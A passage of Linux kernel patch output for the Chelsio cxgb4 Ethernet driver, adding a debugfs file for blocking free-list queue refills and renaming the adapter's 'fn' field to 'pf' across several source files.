kzalloc(size, GFP_KERNEL); + if (!buf) + return -ENOMEM; + + len = snprintf(buf, size - 1, "%*pb\n", + adap->sge.egr_sz, adap->sge.blocked_fl); + len += sprintf(buf + len, "\n"); + size = simple_read_from_buffer(ubuf, count, ppos, buf, len); + t4_free_mem(buf); + return size; +} + +static ssize_t blocked_fl_write(struct file *filp, const char __user *ubuf, + size_t count, loff_t *ppos) +{ + int err; + unsigned long *t; + struct adapter *adap = filp->private_data; + + t = kcalloc(BITS_TO_LONGS(adap->sge.egr_sz), sizeof(long), GFP_KERNEL); + if (!t) + return -ENOMEM; + + err = bitmap_parse_user(ubuf, count, t, adap->sge.egr_sz); + if (err) + return err; + + bitmap_copy(adap->sge.blocked_fl, t, adap->sge.egr_sz); + t4_free_mem(t); + return count; +} + +static const struct file_operations blocked_fl_fops = { + .owner = THIS_MODULE, + .open = blocked_fl_open, + .read = blocked_fl_read, + .write = blocked_fl_write, + .llseek = generic_file_llseek, +}; + /* Add an array of Debug FS files. */ void add_debugfs_files(struct adapter *adap, @@ -2022,6 +2077,7 @@ int t4_setup_debugfs(struct adapter *adap) #if IS_ENABLED(CONFIG_IPV6) { "clip_tbl", &clip_tbl_debugfs_fops, S_IRUSR, 0 }, #endif + { "blocked_fl", &blocked_fl_fops, S_IRUSR | S_IWUSR, 0 }, }; /* Debug FS nodes common to all T5 and later adapters. diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 73ac153795b6..79ef047ee75c 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -3844,7 +3844,7 @@ static int adap_init0(struct adapter *adap) } /* Allocate the memory for the vaious egress queue bitmaps - * ie starving_fl and txq_maperr. + * ie starving_fl, txq_maperr and blocked_fl. */ adap->sge.starving_fl = kcalloc(BITS_TO_LONGS(adap->sge.egr_sz), sizeof(long), GFP_KERNEL); @@ -3860,6 +3860,15 @@ static int adap_init0(struct adapter *adap) goto bye; } +#ifdef CONFIG_DEBUG_FS + adap->sge.blocked_fl = kcalloc(BITS_TO_LONGS(adap->sge.egr_sz), + sizeof(long), GFP_KERNEL); + if (!adap->sge.blocked_fl) { + ret = -ENOMEM; + goto bye; + } +#endif + params[0] = FW_PARAM_PFVF(CLIP_START); params[1] = FW_PARAM_PFVF(CLIP_END); ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, params, val); @@ -4072,6 +4081,9 @@ static int adap_init0(struct adapter *adap) kfree(adap->sge.ingr_map); kfree(adap->sge.starving_fl); kfree(adap->sge.txq_maperr); +#ifdef CONFIG_DEBUG_FS + kfree(adap->sge.blocked_fl); +#endif if (ret != -ETIMEDOUT && ret != -EIO) t4_fw_bye(adap, adap->mbox); return ret; @@ -4515,6 +4527,9 @@ static void free_some_resources(struct adapter *adapter) kfree(adapter->sge.ingr_map); kfree(adapter->sge.starving_fl); kfree(adapter->sge.txq_maperr); +#ifdef CONFIG_DEBUG_FS + kfree(adapter->sge.blocked_fl); +#endif disable_msi(adapter); for_each_port(adapter, i) @@ -4661,6 +4676,9 @@ static int init_one(struct pci_dev *pdev, const struct pci_device_id *ent) setup_memwin(adapter); err = adap_init0(adapter); +#ifdef CONFIG_DEBUG_FS + bitmap_zero(adapter->sge.blocked_fl, adapter->sge.egr_sz); +#endif setup_memwin_rdma(adapter); if (err) goto out_unmap_bar; diff --git a/drivers/net/ethernet/chelsio/cxgb4/sge.c b/drivers/net/ethernet/chelsio/cxgb4/sge.c index dd18fcb644f9..19886d5506a4 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/sge.c +++ b/drivers/net/ethernet/chelsio/cxgb4/sge.c @@ -588,6 +588,11 @@ static unsigned int refill_fl(struct adapter *adap, struct sge_fl *q, int n, struct rx_sw_desc *sd = &q->sdesc[q->pidx]; int node; +#ifdef CONFIG_DEBUG_FS + if (test_bit(q->cntxt_id - adap->sge.egr_start, adap->sge.blocked_fl)) + goto out; +#endif + gfp |= __GFP_NOWARN; node = dev_to_node(adap->pdev_dev); From b261272276777f0af94fa3da07a64ece9e4626e3 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Wed, 27 May 2015 22:30:24 +0530 Subject: [PATCH 321/872] cxgb4/cxgb4vf: function and argument name cleanup This patch changes variable name 'fn' to 'pf' of structure adapter. A 'fn' usually stands for PCI function which could be a PF or a VF. However, the use of this particular variable is explicitly limited to PF only. So, be specific about it in the variable name. Also corrects arguments passed for fn t4_ofld_eq_free, t4_ctrl_eq_free, t4_eth_eq_free, t4_iq_free, t4_alloc_vi, t4_fw_hello, t4_wr_mbox and t4_cfg_pfvf function. Also renames cxgb4_t4_bar2_sge_qregs to t4_bar2_sge_qregs and renames the latter function name in cxgb4vf driver to t4vf_bar2_sge_qregs to avoid conflicts. Also fixes alignment for these function. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 4 +- .../ethernet/chelsio/cxgb4/cxgb4_debugfs.c | 2 +- .../ethernet/chelsio/cxgb4/cxgb4_ethtool.c | 16 ++-- .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 78 +++++++++---------- drivers/net/ethernet/chelsio/cxgb4/sge.c | 30 +++---- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 22 +++--- drivers/net/ethernet/chelsio/cxgb4vf/sge.c | 4 +- .../ethernet/chelsio/cxgb4vf/t4vf_common.h | 10 +-- .../net/ethernet/chelsio/cxgb4vf/t4vf_hw.c | 12 +-- 9 files changed, 89 insertions(+), 89 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 63c30f325929..15cca3013de2 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -679,7 +679,7 @@ struct adapter { struct pci_dev *pdev; struct device *pdev_dev; unsigned int mbox; - unsigned int fn; + unsigned int pf; unsigned int flags; enum chip_type chip; @@ -1221,7 +1221,7 @@ int t4_prep_fw(struct adapter *adap, struct fw_info *fw_info, int t4_prep_adapter(struct adapter *adapter); enum t4_bar2_qtype { T4_BAR2_QTYPE_EGRESS, T4_BAR2_QTYPE_INGRESS }; -int cxgb4_t4_bar2_sge_qregs(struct adapter *adapter, +int t4_bar2_sge_qregs(struct adapter *adapter, unsigned int qid, enum t4_bar2_qtype qtype, u64 *pbar2_qoffset, diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c index 3fa363232283..7cb423745974 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c @@ -1222,7 +1222,7 @@ static int sensors_show(struct seq_file *seq, void *v) param[1] = (FW_PARAMS_MNEM_V(FW_PARAMS_MNEM_DEV) | FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_DIAG) | FW_PARAMS_PARAM_Y_V(FW_PARAM_DEV_DIAG_VDD)); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 2, param, val); if (ret < 0 || val[0] == 0) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c index 401272a2691e..13d5101a0d9f 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c @@ -250,7 +250,7 @@ static int restart_autoneg(struct net_device *dev) return -EAGAIN; if (p->link_cfg.autoneg != AUTONEG_ENABLE) return -EINVAL; - t4_restart_aneg(p->adapter, p->adapter->fn, p->tx_chan); + t4_restart_aneg(p->adapter, p->adapter->pf, p->tx_chan); return 0; } @@ -267,7 +267,7 @@ static int identify_port(struct net_device *dev, else return -EINVAL; - return t4_identify_port(adap, adap->fn, netdev2pinfo(dev)->viid, val); + return t4_identify_port(adap, adap->pf, netdev2pinfo(dev)->viid, val); } static unsigned int from_fw_linkcaps(enum fw_port_type type, unsigned int caps) @@ -439,7 +439,7 @@ static int set_settings(struct net_device *dev, struct ethtool_cmd *cmd) lc->autoneg = cmd->autoneg; if (netif_running(dev)) - return t4_link_start(p->adapter, p->adapter->fn, p->tx_chan, + return t4_link_start(p->adapter, p->adapter->pf, p->tx_chan, lc); return 0; } @@ -472,7 +472,7 @@ static int set_pauseparam(struct net_device *dev, if (epause->tx_pause) lc->requested_fc |= PAUSE_TX; if (netif_running(dev)) - return t4_link_start(p->adapter, p->adapter->fn, p->tx_chan, + return t4_link_start(p->adapter, p->adapter->pf, p->tx_chan, lc); return 0; } @@ -617,7 +617,7 @@ static int eeprom_ptov(unsigned int phys_addr, unsigned int fn, unsigned int sz) */ static int eeprom_rd_phys(struct adapter *adap, unsigned int phys_addr, u32 *v) { - int vaddr = eeprom_ptov(phys_addr, adap->fn, EEPROMPFSIZE); + int vaddr = eeprom_ptov(phys_addr, adap->pf, EEPROMPFSIZE); if (vaddr >= 0) vaddr = pci_read_vpd(adap->pdev, vaddr, sizeof(u32), v); @@ -626,7 +626,7 @@ static int eeprom_rd_phys(struct adapter *adap, unsigned int phys_addr, u32 *v) static int eeprom_wr_phys(struct adapter *adap, unsigned int phys_addr, u32 v) { - int vaddr = eeprom_ptov(phys_addr, adap->fn, EEPROMPFSIZE); + int vaddr = eeprom_ptov(phys_addr, adap->pf, EEPROMPFSIZE); if (vaddr >= 0) vaddr = pci_write_vpd(adap->pdev, vaddr, sizeof(u32), &v); @@ -669,8 +669,8 @@ static int set_eeprom(struct net_device *dev, struct ethtool_eeprom *eeprom, aligned_offset = eeprom->offset & ~3; aligned_len = (eeprom->len + (eeprom->offset & 3) + 3) & ~3; - if (adapter->fn > 0) { - u32 start = 1024 + adapter->fn * EEPROMPFSIZE; + if (adapter->pf > 0) { + u32 start = 1024 + adapter->pf * EEPROMPFSIZE; if (aligned_offset < start || aligned_offset + aligned_len > start + EEPROMPFSIZE) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 79ef047ee75c..4f69b5237129 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -322,7 +322,7 @@ static void dcb_tx_queue_prio_enable(struct net_device *dev, int enable) * level") we need to issue the Set Parameters Commannd * without sleeping (timeout < 0). */ - err = t4_set_params_timeout(adap, adap->mbox, adap->fn, 0, 1, + err = t4_set_params_timeout(adap, adap->mbox, adap->pf, 0, 1, &name, &value, -FW_CMD_MAX_TIMEOUT); @@ -387,7 +387,7 @@ static int set_addr_filters(const struct net_device *dev, bool sleep) int uc_cnt = netdev_uc_count(dev); int mc_cnt = netdev_mc_count(dev); const struct port_info *pi = netdev_priv(dev); - unsigned int mb = pi->adapter->fn; + unsigned int mb = pi->adapter->pf; /* first do the secondary unicast addresses */ netdev_for_each_uc_addr(ha, dev) { @@ -444,7 +444,7 @@ static int set_rxmode(struct net_device *dev, int mtu, bool sleep_ok) ret = set_addr_filters(dev, sleep_ok); if (ret == 0) - ret = t4_set_rxmode(pi->adapter, pi->adapter->fn, pi->viid, mtu, + ret = t4_set_rxmode(pi->adapter, pi->adapter->pf, pi->viid, mtu, (dev->flags & IFF_PROMISC) ? 1 : 0, (dev->flags & IFF_ALLMULTI) ? 1 : 0, 1, -1, sleep_ok); @@ -461,7 +461,7 @@ static int link_start(struct net_device *dev) { int ret; struct port_info *pi = netdev_priv(dev); - unsigned int mb = pi->adapter->fn; + unsigned int mb = pi->adapter->pf; /* * We do not set address filters and promiscuity here, the stack does @@ -879,7 +879,7 @@ int cxgb4_write_rss(const struct port_info *pi, const u16 *queues) for (i = 0; i < pi->rss_size; i++, queues++) rss[i] = rxq[*queues].rspq.abs_id; - err = t4_config_rss_range(adapter, adapter->fn, pi->viid, 0, + err = t4_config_rss_range(adapter, adapter->pf, pi->viid, 0, pi->rss_size, rss, pi->rss_size); /* If Tunnel All Lookup isn't specified in the global RSS * Configuration, then we need to specify a default Ingress @@ -1416,8 +1416,8 @@ int cxgb4_set_rspq_intr_params(struct sge_rspq *q, FW_PARAMS_PARAM_X_V( FW_PARAMS_PARAM_DMAQ_IQ_INTCNTTHRESH) | FW_PARAMS_PARAM_YZ_V(q->cntxt_id); - err = t4_set_params(adap, adap->fn, adap->fn, 0, 1, &v, - &new_idx); + err = t4_set_params(adap, adap->mbox, adap->pf, 0, 1, + &v, &new_idx); if (err) return err; } @@ -1438,7 +1438,7 @@ static int cxgb_set_features(struct net_device *dev, netdev_features_t features) if (!(changed & NETIF_F_HW_VLAN_CTAG_RX)) return 0; - err = t4_set_rxmode(pi->adapter, pi->adapter->fn, pi->viid, -1, + err = t4_set_rxmode(pi->adapter, pi->adapter->pf, pi->viid, -1, -1, -1, -1, !!(features & NETIF_F_HW_VLAN_CTAG_RX), true); if (unlikely(err)) @@ -2175,7 +2175,7 @@ int cxgb4_bar2_sge_qregs(struct net_device *dev, u64 *pbar2_qoffset, unsigned int *pbar2_qid) { - return cxgb4_t4_bar2_sge_qregs(netdev2adap(dev), + return t4_bar2_sge_qregs(netdev2adap(dev), qid, (qtype == CXGB4_BAR2_QTYPE_EGRESS ? T4_BAR2_QTYPE_EGRESS @@ -2377,7 +2377,7 @@ static void process_db_drop(struct work_struct *work) unsigned int bar2_qid; int ret; - ret = cxgb4_t4_bar2_sge_qregs(adap, qid, T4_BAR2_QTYPE_EGRESS, + ret = t4_bar2_sge_qregs(adap, qid, T4_BAR2_QTYPE_EGRESS, &bar2_qoffset, &bar2_qid); if (ret) dev_err(adap->pdev_dev, "doorbell drop recovery: " @@ -2420,7 +2420,7 @@ static void uld_attach(struct adapter *adap, unsigned int uld) unsigned short i; lli.pdev = adap->pdev; - lli.pf = adap->fn; + lli.pf = adap->pf; lli.l2t = adap->l2t; lli.tids = &adap->tids; lli.ports = adap->port; @@ -2757,7 +2757,7 @@ static int cxgb_close(struct net_device *dev) netif_tx_stop_all_queues(dev); netif_carrier_off(dev); - return t4_enable_vi(adapter, adapter->fn, pi->viid, false, false); + return t4_enable_vi(adapter, adapter->pf, pi->viid, false, false); } /* Return an error number if the indicated filter isn't writable ... @@ -2960,7 +2960,7 @@ static int cxgb_ioctl(struct net_device *dev, struct ifreq *req, int cmd) } else return -EINVAL; - mbox = pi->adapter->fn; + mbox = pi->adapter->pf; if (cmd == SIOCGMIIREG) ret = t4_mdio_rd(pi->adapter, mbox, prtad, devad, data->reg_num, &data->val_out); @@ -2987,7 +2987,7 @@ static int cxgb_change_mtu(struct net_device *dev, int new_mtu) if (new_mtu < 81 || new_mtu > MAX_MTU) /* accommodate SACK */ return -EINVAL; - ret = t4_set_rxmode(pi->adapter, pi->adapter->fn, pi->viid, new_mtu, -1, + ret = t4_set_rxmode(pi->adapter, pi->adapter->pf, pi->viid, new_mtu, -1, -1, -1, -1, true); if (!ret) dev->mtu = new_mtu; @@ -3003,7 +3003,7 @@ static int cxgb_set_mac_addr(struct net_device *dev, void *p) if (!is_valid_ether_addr(addr->sa_data)) return -EADDRNOTAVAIL; - ret = t4_change_mac(pi->adapter, pi->adapter->fn, pi->viid, + ret = t4_change_mac(pi->adapter, pi->adapter->pf, pi->viid, pi->xact_addr_filt, addr->sa_data, true, true); if (ret < 0) return ret; @@ -3100,7 +3100,7 @@ static int adap_init1(struct adapter *adap, struct fw_caps_config_cmd *c) c->op_to_write = htonl(FW_CMD_OP_V(FW_CAPS_CONFIG_CMD) | FW_CMD_REQUEST_F | FW_CMD_READ_F); c->cfvalid_to_len16 = htonl(FW_LEN16(*c)); - ret = t4_wr_mbox(adap, adap->fn, c, sizeof(*c), c); + ret = t4_wr_mbox(adap, adap->mbox, c, sizeof(*c), c); if (ret < 0) return ret; @@ -3116,18 +3116,18 @@ static int adap_init1(struct adapter *adap, struct fw_caps_config_cmd *c) } c->op_to_write = htonl(FW_CMD_OP_V(FW_CAPS_CONFIG_CMD) | FW_CMD_REQUEST_F | FW_CMD_WRITE_F); - ret = t4_wr_mbox(adap, adap->fn, c, sizeof(*c), NULL); + ret = t4_wr_mbox(adap, adap->mbox, c, sizeof(*c), NULL); if (ret < 0) return ret; - ret = t4_config_glbl_rss(adap, adap->fn, + ret = t4_config_glbl_rss(adap, adap->pf, FW_RSS_GLB_CONFIG_CMD_MODE_BASICVIRTUAL, FW_RSS_GLB_CONFIG_CMD_TNLMAPEN_F | FW_RSS_GLB_CONFIG_CMD_TNLALLLKP_F); if (ret < 0) return ret; - ret = t4_cfg_pfvf(adap, adap->fn, adap->fn, 0, adap->sge.egr_sz, 64, + ret = t4_cfg_pfvf(adap, adap->mbox, adap->pf, 0, adap->sge.egr_sz, 64, MAX_INGQ, 0, 0, 4, 0xf, 0xf, 16, FW_CMD_CAP_PF, FW_CMD_CAP_PF); if (ret < 0) @@ -3171,7 +3171,7 @@ static int adap_init1(struct adapter *adap, struct fw_caps_config_cmd *c) } /* get basic stuff going */ - return t4_early_init(adap, adap->fn); + return t4_early_init(adap, adap->pf); } /* @@ -3434,7 +3434,7 @@ static int adap_init0_config(struct adapter *adapter, int reset) params[0] = (FW_PARAMS_MNEM_V(FW_PARAMS_MNEM_DEV) | FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_CF)); ret = t4_query_params(adapter, adapter->mbox, - adapter->fn, 0, 1, params, val); + adapter->pf, 0, 1, params, val); if (ret == 0) { /* * For t4_memory_rw() below addresses and @@ -3723,7 +3723,7 @@ static int adap_init0(struct adapter *adap) v = FW_PARAMS_MNEM_V(FW_PARAMS_MNEM_DEV) | FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_PORTVEC); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 1, &v, &port_vec); + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 1, &v, &port_vec); if (ret < 0) goto bye; @@ -3746,7 +3746,7 @@ static int adap_init0(struct adapter *adap) */ params[0] = (FW_PARAMS_MNEM_V(FW_PARAMS_MNEM_DEV) | FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_CF)); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 1, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 1, params, val); /* If the firmware doesn't support Configuration Files, @@ -3805,7 +3805,7 @@ static int adap_init0(struct adapter *adap) params[3] = FW_PARAM_PFVF(FILTER_START); params[4] = FW_PARAM_PFVF(FILTER_END); params[5] = FW_PARAM_PFVF(IQFLINT_START); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 6, params, val); + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 6, params, val); if (ret < 0) goto bye; adap->sge.egr_start = val[0]; @@ -3823,7 +3823,7 @@ static int adap_init0(struct adapter *adap) */ params[0] = FW_PARAM_PFVF(EQ_END); params[1] = FW_PARAM_PFVF(IQFLINT_END); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, params, val); + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 2, params, val); if (ret < 0) goto bye; adap->sge.egr_sz = val[0] - adap->sge.egr_start + 1; @@ -3871,7 +3871,7 @@ static int adap_init0(struct adapter *adap) params[0] = FW_PARAM_PFVF(CLIP_START); params[1] = FW_PARAM_PFVF(CLIP_END); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, params, val); + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 2, params, val); if (ret < 0) goto bye; adap->clipt_start = val[0]; @@ -3880,7 +3880,7 @@ static int adap_init0(struct adapter *adap) /* query params related to active filter region */ params[0] = FW_PARAM_PFVF(ACTIVE_FILTER_START); params[1] = FW_PARAM_PFVF(ACTIVE_FILTER_END); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, params, val); + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 2, params, val); /* If Active filter size is set we enable establishing * offload connection through firmware work request */ @@ -3897,7 +3897,7 @@ static int adap_init0(struct adapter *adap) */ params[0] = FW_PARAM_PFVF(CPLFW4MSG_ENCAP); val[0] = 1; - (void) t4_set_params(adap, adap->mbox, adap->fn, 0, 1, params, val); + (void)t4_set_params(adap, adap->mbox, adap->pf, 0, 1, params, val); /* * Find out whether we're allowed to use the T5+ ULPTX MEMWRITE DSGL @@ -3909,7 +3909,7 @@ static int adap_init0(struct adapter *adap) adap->params.ulptx_memwrite_dsgl = false; } else { params[0] = FW_PARAM_DEV(ULPTX_MEMWRITE_DSGL); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 1, params, val); adap->params.ulptx_memwrite_dsgl = (ret == 0 && val[0] != 0); } @@ -3935,7 +3935,7 @@ static int adap_init0(struct adapter *adap) params[3] = FW_PARAM_PFVF(TDDP_START); params[4] = FW_PARAM_PFVF(TDDP_END); params[5] = FW_PARAM_DEV(FLOWC_BUFFIFO_SZ); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 6, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 6, params, val); if (ret < 0) goto bye; @@ -3973,7 +3973,7 @@ static int adap_init0(struct adapter *adap) params[3] = FW_PARAM_PFVF(RQ_END); params[4] = FW_PARAM_PFVF(PBL_START); params[5] = FW_PARAM_PFVF(PBL_END); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 6, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 6, params, val); if (ret < 0) goto bye; @@ -3990,7 +3990,7 @@ static int adap_init0(struct adapter *adap) params[3] = FW_PARAM_PFVF(CQ_END); params[4] = FW_PARAM_PFVF(OCQ_START); params[5] = FW_PARAM_PFVF(OCQ_END); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 6, params, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 6, params, val); if (ret < 0) goto bye; @@ -4003,7 +4003,7 @@ static int adap_init0(struct adapter *adap) params[0] = FW_PARAM_DEV(MAXORDIRD_QP); params[1] = FW_PARAM_DEV(MAXIRD_ADAPTER); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, params, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 2, params, val); if (ret < 0) { adap->params.max_ordird_qp = 8; @@ -4021,7 +4021,7 @@ static int adap_init0(struct adapter *adap) if (caps_cmd.iscsicaps) { params[0] = FW_PARAM_PFVF(ISCSI_START); params[1] = FW_PARAM_PFVF(ISCSI_END); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 2, params, val); if (ret < 0) goto bye; @@ -4151,7 +4151,7 @@ static pci_ers_result_t eeh_slot_reset(struct pci_dev *pdev) if (t4_wait_dev_ready(adap->regs) < 0) return PCI_ERS_RESULT_DISCONNECT; - if (t4_fw_hello(adap, adap->fn, adap->fn, MASTER_MUST, NULL) < 0) + if (t4_fw_hello(adap, adap->mbox, adap->pf, MASTER_MUST, NULL) < 0) return PCI_ERS_RESULT_DISCONNECT; adap->flags |= FW_OK; if (adap_init1(adap, &c)) @@ -4160,7 +4160,7 @@ static pci_ers_result_t eeh_slot_reset(struct pci_dev *pdev) for_each_port(adap, i) { struct port_info *p = adap2pinfo(adap, i); - ret = t4_alloc_vi(adap, adap->fn, p->tx_chan, adap->fn, 0, 1, + ret = t4_alloc_vi(adap, adap->mbox, p->tx_chan, adap->pf, 0, 1, NULL, NULL); if (ret < 0) return PCI_ERS_RESULT_DISCONNECT; @@ -4538,7 +4538,7 @@ static void free_some_resources(struct adapter *adapter) free_netdev(adapter->port[i]); } if (adapter->flags & FW_OK) - t4_fw_bye(adapter, adapter->fn); + t4_fw_bye(adapter, adapter->pf); } #define TSO_FLAGS (NETIF_F_TSO | NETIF_F_TSO6 | NETIF_F_TSO_ECN) @@ -4629,7 +4629,7 @@ static int init_one(struct pci_dev *pdev, const struct pci_device_id *ent) adapter->pdev = pdev; adapter->pdev_dev = &pdev->dev; adapter->mbox = func; - adapter->fn = func; + adapter->pf = func; adapter->msg_enable = dflt_msg_enable; memset(adapter->chan_map, 0xff, sizeof(adapter->chan_map)); @@ -4649,7 +4649,7 @@ static int init_one(struct pci_dev *pdev, const struct pci_device_id *ent) if (!is_t4(adapter->params.chip)) { s_qpp = (QUEUESPERPAGEPF0_S + (QUEUESPERPAGEPF1_S - QUEUESPERPAGEPF0_S) * - adapter->fn); + adapter->pf); qpp = 1 << QUEUESPERPAGEPF0_G(t4_read_reg(adapter, SGE_EGRESS_QUEUES_PER_PAGE_PF_A) >> s_qpp); num_seg = PAGE_SIZE / SEGMENT_SIZE; diff --git a/drivers/net/ethernet/chelsio/cxgb4/sge.c b/drivers/net/ethernet/chelsio/cxgb4/sge.c index 19886d5506a4..f9c889e14634 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/sge.c +++ b/drivers/net/ethernet/chelsio/cxgb4/sge.c @@ -1265,7 +1265,7 @@ out_free: dev_kfree_skb_any(skb); cpl->ctrl0 = htonl(TXPKT_OPCODE_V(CPL_TX_PKT_XT) | TXPKT_INTF_V(pi->tx_chan) | - TXPKT_PF_V(adap->fn)); + TXPKT_PF_V(adap->pf)); cpl->pack = htons(0); cpl->len = htons(skb->len); cpl->ctrl1 = cpu_to_be64(cntrl); @@ -2390,7 +2390,7 @@ static void __iomem *bar2_address(struct adapter *adapter, u64 bar2_qoffset; int ret; - ret = cxgb4_t4_bar2_sge_qregs(adapter, qid, qtype, + ret = t4_bar2_sge_qregs(adapter, qid, qtype, &bar2_qoffset, pbar2_qid); if (ret) return NULL; @@ -2421,7 +2421,7 @@ int t4_sge_alloc_rxq(struct adapter *adap, struct sge_rspq *iq, bool fwevtq, memset(&c, 0, sizeof(c)); c.op_to_vfn = htonl(FW_CMD_OP_V(FW_IQ_CMD) | FW_CMD_REQUEST_F | FW_CMD_WRITE_F | FW_CMD_EXEC_F | - FW_IQ_CMD_PFN_V(adap->fn) | FW_IQ_CMD_VFN_V(0)); + FW_IQ_CMD_PFN_V(adap->pf) | FW_IQ_CMD_VFN_V(0)); c.alloc_to_len16 = htonl(FW_IQ_CMD_ALLOC_F | FW_IQ_CMD_IQSTART_F | FW_LEN16(c)); c.type_to_iqandstindex = htonl(FW_IQ_CMD_TYPE_V(FW_IQ_TYPE_FL_INT_CAP) | @@ -2473,7 +2473,7 @@ int t4_sge_alloc_rxq(struct adapter *adap, struct sge_rspq *iq, bool fwevtq, c.fl0addr = cpu_to_be64(fl->addr); } - ret = t4_wr_mbox(adap, adap->fn, &c, sizeof(c), &c); + ret = t4_wr_mbox(adap, adap->mbox, &c, sizeof(c), &c); if (ret) goto err; @@ -2541,7 +2541,7 @@ int t4_sge_alloc_rxq(struct adapter *adap, struct sge_rspq *iq, bool fwevtq, CONMCTXT_CNGCHMAP_V(1 << (i << 2)); } } - ret = t4_set_params(adap, adap->mbox, adap->fn, 0, 1, + ret = t4_set_params(adap, adap->mbox, adap->pf, 0, 1, ¶m, &val); if (ret) dev_warn(adap->pdev_dev, "Failed to set Congestion" @@ -2606,7 +2606,7 @@ int t4_sge_alloc_eth_txq(struct adapter *adap, struct sge_eth_txq *txq, memset(&c, 0, sizeof(c)); c.op_to_vfn = htonl(FW_CMD_OP_V(FW_EQ_ETH_CMD) | FW_CMD_REQUEST_F | FW_CMD_WRITE_F | FW_CMD_EXEC_F | - FW_EQ_ETH_CMD_PFN_V(adap->fn) | + FW_EQ_ETH_CMD_PFN_V(adap->pf) | FW_EQ_ETH_CMD_VFN_V(0)); c.alloc_to_len16 = htonl(FW_EQ_ETH_CMD_ALLOC_F | FW_EQ_ETH_CMD_EQSTART_F | FW_LEN16(c)); @@ -2623,7 +2623,7 @@ int t4_sge_alloc_eth_txq(struct adapter *adap, struct sge_eth_txq *txq, FW_EQ_ETH_CMD_EQSIZE_V(nentries)); c.eqaddr = cpu_to_be64(txq->q.phys_addr); - ret = t4_wr_mbox(adap, adap->fn, &c, sizeof(c), &c); + ret = t4_wr_mbox(adap, adap->mbox, &c, sizeof(c), &c); if (ret) { kfree(txq->q.sdesc); txq->q.sdesc = NULL; @@ -2661,7 +2661,7 @@ int t4_sge_alloc_ctrl_txq(struct adapter *adap, struct sge_ctrl_txq *txq, c.op_to_vfn = htonl(FW_CMD_OP_V(FW_EQ_CTRL_CMD) | FW_CMD_REQUEST_F | FW_CMD_WRITE_F | FW_CMD_EXEC_F | - FW_EQ_CTRL_CMD_PFN_V(adap->fn) | + FW_EQ_CTRL_CMD_PFN_V(adap->pf) | FW_EQ_CTRL_CMD_VFN_V(0)); c.alloc_to_len16 = htonl(FW_EQ_CTRL_CMD_ALLOC_F | FW_EQ_CTRL_CMD_EQSTART_F | FW_LEN16(c)); @@ -2678,7 +2678,7 @@ int t4_sge_alloc_ctrl_txq(struct adapter *adap, struct sge_ctrl_txq *txq, FW_EQ_CTRL_CMD_EQSIZE_V(nentries)); c.eqaddr = cpu_to_be64(txq->q.phys_addr); - ret = t4_wr_mbox(adap, adap->fn, &c, sizeof(c), &c); + ret = t4_wr_mbox(adap, adap->mbox, &c, sizeof(c), &c); if (ret) { dma_free_coherent(adap->pdev_dev, nentries * sizeof(struct tx_desc), @@ -2716,7 +2716,7 @@ int t4_sge_alloc_ofld_txq(struct adapter *adap, struct sge_ofld_txq *txq, memset(&c, 